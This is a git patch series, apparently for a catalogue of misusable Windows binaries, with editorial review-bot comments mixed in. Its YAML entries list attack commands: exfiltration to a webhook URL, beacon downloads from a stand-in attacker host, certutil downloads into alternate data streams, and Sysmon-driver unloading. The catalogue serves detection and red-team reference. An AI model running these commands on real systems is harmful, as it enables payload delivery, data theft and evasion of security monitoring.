From 39d4e815af08990918c62a8fe141308aa54de99b Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 14 Dec 2021 14:57:32 +0000 Subject: [PATCH 01/11] Minor formatting changes (redudant backslashes, incorrect dates, typos, etc.) --- yml/OSBinaries/AppInstaller.yml | 2 +- yml/OSBinaries/Atbroker.yml | 2 +- yml/OSBinaries/Cmdl32.yml | 2 +- yml/OSBinaries/ConfigSecurityPolicy.yml | 2 +- yml/OSBinaries/DataSvcUtil.yml | 4 ++-- yml/OSBinaries/Dllhost.yml | 2 +- yml/OSBinaries/FltMC.yml | 2 +- yml/OSBinaries/IMEWDBLD.yml | 2 +- yml/OSBinaries/MpCmdRun.yml | 2 +- yml/OSBinaries/OfflineScannerShell.yml | 2 +- yml/OSBinaries/OneDriveStandaloneUpdater.yml | 2 +- yml/OSBinaries/PrintBrm.yml | 2 +- yml/OSBinaries/SettingSyncHost.yml | 2 +- yml/OSBinaries/Stordiag.yml | 2 +- yml/OSBinaries/WorkFolders.yml | 2 +- yml/OSLibraries/Ieframe.yml | 2 +- yml/OSLibraries/Setupapi.yml | 4 ++-- yml/OSLibraries/Shdocvw.yml | 6 +++--- yml/OSScripts/CL_mutexverifiers.yml | 2 +- yml/OSScripts/Cl_invocation.yml | 2 +- yml/OtherMSBinaries/Procdump.yml | 2 +- yml/OtherMSBinaries/VSIISExeLauncher.yml | 2 +- 22 files changed, 26 insertions(+), 26 deletions(-) diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml index ddeb505..17d1b89 100644 --- a/yml/OSBinaries/AppInstaller.yml +++ b/yml/OSBinaries/AppInstaller.yml @@ -2,7 +2,7 @@ Name: AppInstaller.exe Description: Tool used for installation of AppX/MSIX applications on Windows 10 Author: 'Wade Hickey' -Created: '2020-12-02' +Created: 2020-12-02 Commands: - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 45ffc5f..7935735 100644 --- a/yml/OSBinaries/Atbroker.yml 
+++ b/yml/OSBinaries/Atbroker.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: ATBroker.exe /start malware Description: Start a registered Assistive Technology (AT). - Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. + Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry. Category: Execute Privileges: User MitreID: T1218 diff --git a/yml/OSBinaries/Cmdl32.yml b/yml/OSBinaries/Cmdl32.yml index 275827c..afb8385 100644 --- a/yml/OSBinaries/Cmdl32.yml +++ b/yml/OSBinaries/Cmdl32.yml @@ -2,7 +2,7 @@ Name: cmdl32.exe Description: Microsoft Connection Manager Auto-Download Author: 'Elliot Killick' -Created: '2021-08-26' +Created: 2021-08-26 Commands: - Command: cmdl32 /vpn /lan %cd%\config Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter. diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index bd739c3..1991f85 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -4,7 +4,7 @@ Description: Binary part of Windows Defender. Used to manage settings in Windows Author: 'Ialle Teixeira' Created: 2020-09-04 Commands: - - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile + - Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile Description: Upload file, credentials or data exfiltration in general Usecase: Upload file Category: Upload diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml index e5d5c20..37a1028 100644 
--- a/yml/OSBinaries/DataSvcUtil.yml +++ b/yml/OSBinaries/DataSvcUtil.yml @@ -2,9 +2,9 @@ Name: DataSvcUtil.exe Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application. Author: 'Ialle Teixeira' -Created: '01/12/2020' +Created: 2020-12-01 Commands: - - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile + - Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile Description: Upload file, credentials or data exfiltration in general Usecase: Upload file Category: Upload diff --git a/yml/OSBinaries/Dllhost.yml b/yml/OSBinaries/Dllhost.yml index beda52f..7dc777c 100644 --- a/yml/OSBinaries/Dllhost.yml +++ b/yml/OSBinaries/Dllhost.yml @@ -2,7 +2,7 @@ Name: Dllhost.exe Description: Used by Windows to DLL Surrogate COM Objects Author: 'Nasreddine Bencherchali' -Created: '2020-11-07' +Created: 2020-11-07 Commands: - Command: dllhost.exe /Processid:{CLSID} Description: Use dllhost.exe to load a registered or hijacked COM Server payload. diff --git a/yml/OSBinaries/FltMC.yml b/yml/OSBinaries/FltMC.yml index 8717c5b..d418061 100644 --- a/yml/OSBinaries/FltMC.yml +++ b/yml/OSBinaries/FltMC.yml @@ -2,7 +2,7 @@ Name: fltMC.exe Description: Filter Manager Control Program used by Windows Author: 'John Lambert' -Created: '2021-09-18' +Created: 2021-09-18 Commands: - Command: fltMC.exe unload SysmonDrv Description: Unloads a driver used by security agents diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml index 2401ae7..f87e700 100644 --- a/yml/OSBinaries/IMEWDBLD.yml +++ b/yml/OSBinaries/IMEWDBLD.yml 
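Review bot: The DataSvcUtil hunk resolves the ambiguous `Created: '01/12/2020'` to `Created: 2020-12-01`, but that string could just as well have meant 12 January 2020 and nothing in the diff shows which reading is right. Confirm the date against the commit that first added DataSvcUtil.yml before normalising it, rather than assuming day-first. Dropping the quotes also changes how YAML 1.1 loaders such as PyYAML type the field (a date object instead of a string); that matches the other entries in this patch, but a schema check on `Created` would stop future entries regressing to quoted or non-ISO dates.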
@@ -2,7 +2,7 @@ Name: IMEWDBLD.exe Description: Microsoft IME Open Extended Dictionary Module Author: 'Wade Hickey' -Created: '2020-03-05' +Created: 2020-03-05 Commands: - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 33ac149..10b5fa4 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -18,7 +18,7 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10 - - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe + - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe Description: Download file to machine and store it in Alternate Data Stream Usecase: Hide downloaded data inton an Alternate Data Stream Category: ADS diff --git a/yml/OSBinaries/OfflineScannerShell.yml b/yml/OSBinaries/OfflineScannerShell.yml index e12ad2c..2f1b8ee 100644 --- a/yml/OSBinaries/OfflineScannerShell.yml +++ b/yml/OSBinaries/OfflineScannerShell.yml @@ -2,7 +2,7 @@ Name: OfflineScannerShell.exe Description: Windows Defender Offline Shell Author: 'Elliot Killick' -Created: '2021-08-16' +Created: 2021-08-16 Commands: - Command: OfflineScannerShell Description: Execute mpclient.dll library in the current working directory diff --git a/yml/OSBinaries/OneDriveStandaloneUpdater.yml b/yml/OSBinaries/OneDriveStandaloneUpdater.yml index b61a6e8..8c69fcb 100644 --- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml +++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml 
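Review bot: The MpCmdRun hunk keeps `Usecase: Hide downloaded data inton an Alternate Data Stream` while this patch is the typo pass; it should read `Usecase: Hide downloaded data into an Alternate Data Stream`. The backslash change on the `-path c:\temp\nicefile.txt:evil.exe` line is correct for a plain scalar, so that part needs no further work.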
@@ -2,7 +2,7 @@ Name: OneDriveStandaloneUpdater.exe Description: OneDrive Standalone Updater Author: 'Elliot Killick' -Created: '2021-08-22' +Created: 2021-08-22 Commands: - Command: OneDriveStandaloneUpdater Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index ab90165..cdee207 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml @@ -2,7 +2,7 @@ Name: PrintBrm.exe Description: Printer Migration Command-Line Tool Author: 'Elliot Killick' -Created: '2021-06-21' +Created: 2021-06-21 Commands: - Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip Description: Create a ZIP file from a folder in a remote drive diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index e171778..6c4d9fe 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -2,7 +2,7 @@ Name: SettingSyncHost.exe Description: Host Process for Setting Synchronization Author: 'Elliot Killick' -Created: '2021-08-26' +Created: 2021-08-26 Commands: - Command: SettingSyncHost -LoadAndRunDiagScript anything Description: Execute file specified in %COMSPEC% diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index 8d2b315..653fa1f 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml 
@@ -2,7 +2,7 @@ Name: Stordiag.exe Description: Storage diagnostic tool Author: 'Eral4m' -Created: '2021-10-21' +Created: 2021-10-21 Commands: - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index 6d271a1..adf5a71 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -2,7 +2,7 @@ Name: WorkFolders.exe Description: Work Folders Author: 'Elliot Killick' -Created: '2021-08-16' +Created: 2021-08-16 Commands: - Command: WorkFolders Description: Execute control.exe in the current working directory diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 34f939d..ba04167 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -2,7 +2,7 @@ Name: Ieaframe.dll Description: Internet Browser DLL for translating HTML code. Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 4295dd3..02264de 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -2,7 +2,7 @@ Name: Setupapi.dll Description: Windows Setup Application Programming Interface Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). 
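Review bot: The Ieframe hunk leaves `Name: Ieaframe.dll` in place, which matches neither the file name (Ieframe.yml) nor the `rundll32.exe ieframe.dll,OpenURL` command shown in the same hunk; since this commit is the typo pass it should become `Name: Ieframe.dll`. Anything that builds the site index or a detection lookup from the `Name` field would otherwise list a library that does not exist on disk.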
@@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows - - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. UseCase: Load an executable payload. Category: Execute diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 8a8dccd..f344462 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -1,12 +1,12 @@ --- Name: Shdocvw.dll Description: Shell Doc Object and Control Library. -Author: +Author: Jimmy (@bohops) Created: 2018-05-25 Commands: - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Description: Launch an executable payload via proxy through a URL (information) file by calling OpenURL. + Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1218.011 diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 5a55cf1..3f8748e 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml 
@@ -4,7 +4,7 @@ Description: Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 + - Command: . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. Usecase: Proxy execution Category: Execute diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 6610eb1..9bfebcb 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -4,7 +4,7 @@ Description: Aero diagnostics script Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke [args] + - Command: . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 \nSyncInvoke [args] Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. Usecase: Proxy execution Category: Execute diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index 65cbb04..9d851cf 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml @@ -2,7 +2,7 @@ Name: Procdump(64).exe Description: SysInternals Memory Dump Tool Author: 'Alfie Champion (@ajpc500)' -Created: '2020-10-14' +Created: 2020-10-14 Commands: - Command: procdump.exe -md calc.dll explorer.exe Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 3b5d330..38c1052 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml 
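Review bot: The `\n` in `. C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1` sits in a plain (unquoted) YAML scalar, so it stays as the two literal characters backslash-n rather than a line break; this patch correctly un-escapes the path backslashes but leaves that one behind. If the intent is two PowerShell statements, write them as a literal block scalar (`Command: |` with one statement per line) or join them with `;` so the rendered command is directly usable. The same literal `\n` appears in `\nSyncInvoke [args]` in the Cl_invocation hunk that follows.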
@@ -2,7 +2,7 @@
 Name: VSIISExeLauncher.exe
 Description: Binary will execute specified binary. Part of VS/VScode installation.
 Author: 'timwhite'
-Created: '2021-09-24'
+Created: 2021-09-24
 Commands:
 - Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here"
 Description: The above binary will execute other binary.
From 754a451e76396cfd7266d4a6acfb9123d79fd7ab Mon Sep 17 00:00:00 2001
From: Wietze Date: Tue, 14 Dec 2021 15:50:17 +0000 Subject: [PATCH 02/11] Updating entries that have been confirmed to be working on Windows 11 (21H2) --- yml/OSBinaries/AppInstaller.yml | 2 +- yml/OSBinaries/Aspnet_Compiler.yml | 54 +++++++++++------------ yml/OSBinaries/Atbroker.yml | 2 +- yml/OSBinaries/Bitsadmin.yml | 4 +- yml/OSBinaries/Certreq.yml | 4 +- yml/OSBinaries/Certutil.yml | 12 ++--- yml/OSBinaries/Cmd.yml | 4 +- yml/OSBinaries/Cmdkey.yml | 2 +- yml/OSBinaries/Cmdl32.yml | 2 +- yml/OSBinaries/Cmstp.yml | 2 +- yml/OSBinaries/Control.yml | 4 +- yml/OSBinaries/Csc.yml | 4 +- yml/OSBinaries/Cscript.yml | 2 +- yml/OSBinaries/Desktopimgdownldr.yml | 2 +- yml/OSBinaries/Dfsvc.yml | 2 +- yml/OSBinaries/Esentutl.yml | 13 +++--- yml/OSBinaries/Expand.yml | 6 +-- yml/OSBinaries/Explorer.yml | 4 +- yml/OSBinaries/Extexport.yml | 2 +- yml/OSBinaries/Extrac32.yml | 8 ++-- yml/OSBinaries/Findstr.yml | 8 ++-- yml/OSBinaries/FltMC.yml | 2 +- yml/OSBinaries/Forfiles.yml | 4 +- yml/OSBinaries/Ftp.yml | 4 +- yml/OSBinaries/Gpscript.yml | 4 +- yml/OSBinaries/Hh.yml | 4 +- yml/OSBinaries/IMEWDBLD.yml | 2 +- yml/OSBinaries/Ie4uinit.yml | 2 +- yml/OSBinaries/Ilasm.yml | 3 +- yml/OSBinaries/Infdefaultinstall.yml | 2 +- yml/OSBinaries/Installutil.yml | 4 +- yml/OSBinaries/Jsc.yml | 4 +- yml/OSBinaries/Makecab.yml | 6 +-- yml/OSBinaries/Mavinject.yml | 4 +- yml/OSBinaries/Msbuild.yml | 10 ++--- yml/OSBinaries/Msdt.yml | 4 +- yml/OSBinaries/Mshta.yml | 4 +- yml/OSBinaries/Msiexec.yml | 8 ++-- yml/OSBinaries/Netsh.yml | 2 +- yml/OSBinaries/Odbcconf.yml | 4 +- yml/OSBinaries/OfflineScannerShell.yml | 2 +- yml/OSBinaries/Pcalua.yml | 4 +- yml/OSBinaries/Pcwrun.yml | 2 +- yml/OSBinaries/Print.yml | 6 +-- yml/OSBinaries/PrintBrm.yml | 4 +- yml/OSBinaries/Reg.yml | 4 +- yml/OSBinaries/Regasm.yml | 4 +- yml/OSBinaries/Regedit.yml | 4 +- yml/OSBinaries/Regini.yml | 2 +- yml/OSBinaries/Register-cimprovider.yml | 2 +- yml/OSBinaries/Regsvcs.yml | 4 +- yml/OSBinaries/Regsvr32.yml | 8 ++-- 
yml/OSBinaries/Replace.yml | 4 +- yml/OSBinaries/Rpcping.yml | 4 +- yml/OSBinaries/Rundll32.yml | 16 +++---- yml/OSBinaries/Runonce.yml | 2 +- yml/OSBinaries/Sc.yml | 4 +- yml/OSBinaries/Schtasks.yml | 4 +- yml/OSBinaries/Scriptrunner.yml | 4 +- yml/OSBinaries/Stordiag.yml | 2 +- yml/OSBinaries/Verclsid.yml | 2 +- yml/OSBinaries/Wab.yml | 2 +- yml/OSBinaries/Wmic.yml | 12 ++--- yml/OSBinaries/WorkFolders.yml | 2 +- yml/OSBinaries/Wscript.yml | 6 +-- yml/OSBinaries/Wsreset.yml | 2 +- yml/OSBinaries/Xwizard.yml | 6 +-- yml/OSLibraries/Advpack.yml | 10 ++--- yml/OSLibraries/Dfshim.yml | 58 ++++++++++++------------- yml/OSLibraries/Ieadvpack.yml | 8 ++-- yml/OSLibraries/Shell32.yml | 4 +- yml/OSScripts/CL_LoadAssembly.yml | 4 +- yml/OSScripts/Manage-bde.yml | 4 +- yml/OSScripts/UtilityFunctions.yml | 2 +- yml/OSScripts/Winrm.yml | 6 +-- yml/OSScripts/pester.yml | 2 +- 76 files changed, 221 insertions(+), 215 deletions(-) diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml index ddeb505..ef362a1 100644 --- a/yml/OSBinaries/AppInstaller.yml +++ b/yml/OSBinaries/AppInstaller.yml @@ -10,7 +10,7 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe Detection: diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml index a174cb6..ead4d97 100644 --- a/yml/OSBinaries/Aspnet_Compiler.yml +++ b/yml/OSBinaries/Aspnet_Compiler.yml 
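Review bot: The AppInstaller entry now claims Windows 11, but its only `Full_Path` pins one package version (`Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe`), which will differ on a 21H2 image and changes with every Store update. Consider recording a version-independent form such as `C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_*_8wekyb3d8bbwe\AppInstaller.exe`, or noting in the entry which package version was actually tested, so detections keyed on the path do not silently miss.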
@@ -1,27 +1,27 @@ ---- -Name: Aspnet_Compiler.exe -Description: ASP.NET Compilation Tool -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u - Description: Execute C# code with the Build Provider and proper folder structure in place. - Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10 -Full_Path: - - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -Code_Sample: - - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules -Resources: - - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ - - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 -Acknowledgement: - - Person: cpl - Handle: '@cpl3h' ---- +--- +Name: Aspnet_Compiler.exe +Description: ASP.NET Compilation Tool +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u + Description: Execute C# code with the Build Provider and proper folder structure in place. 
+ Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +Code_Sample: + - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules +Resources: + - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ + - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +Acknowledgement: + - Person: cpl + Handle: '@cpl3h' +--- diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 45ffc5f..feb81ea 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index 9a6f56b..3476039 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml 
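Review bot: Every line of Aspnet_Compiler.yml is shown removed and re-added although only `OperatingSystem` changed, which looks like a line-ending (CRLF to LF) rewrite folded into this commit; that hides the single real change from blame and from anyone reviewing the diff. Normalise line endings in a separate commit, or via a `* text=auto` entry in .gitattributes, so the Windows 11 update is the only content of this hunk. While here, the example command embeds a researcher's profile path (`C:\users\cpl.internal\desktop\asptest\`); a neutral placeholder such as `C:\path\to\asptest\` reads better and avoids anyone keying a detection on that username.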
@@ -10,14 +10,14 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset Description: Command for copying cmd.exe to another folder Usecase: Copy file diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index 186e166..f5fe723 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml 
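Review bot: In the Bitsadmin hunk the second entry's `Description` says it adds cmd.exe to the job, but the command adds `https://live.sysinternals.com/autoruns.exe`; the text appears copied from the copy-file entry below it. Suggest `Description: Create a bitsadmin job named 1, add the remote autoruns.exe to the job, then resume and complete the job to download it.` The diffstat shows only two lines changed in this file, so the third (copy-file) command keeps its old `OperatingSystem` list; if it was verified on Windows 11 as well it should be updated, otherwise a short note on why it differs would help readers.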
@@ -10,14 +10,14 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST Usecase: Upload Category: Upload Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\certreq.exe - Path: C:\Windows\SysWOW64\certreq.exe diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index f31d2f7..0e116d5 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml 
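Review bot: `Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal` mixes prose into the command field, so anyone copying it, or any tooling that builds command-line patterns from `Command`, gets the trailing words as arguments. Move the prose out: `Command: CertReq -Post -config https://example.org/ c:\windows\win.ini` and `Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST and show the response in the terminal.` This is pre-existing in the hunk's context rather than introduced here, but it is the obvious line to fix while touching the entry.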
@@ -10,42 +10,42 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe Description: Download and save 7zip to disk in the current folder. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt Description: Download and save a PS1 file to an Alternate Data Stream (ADS). Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream 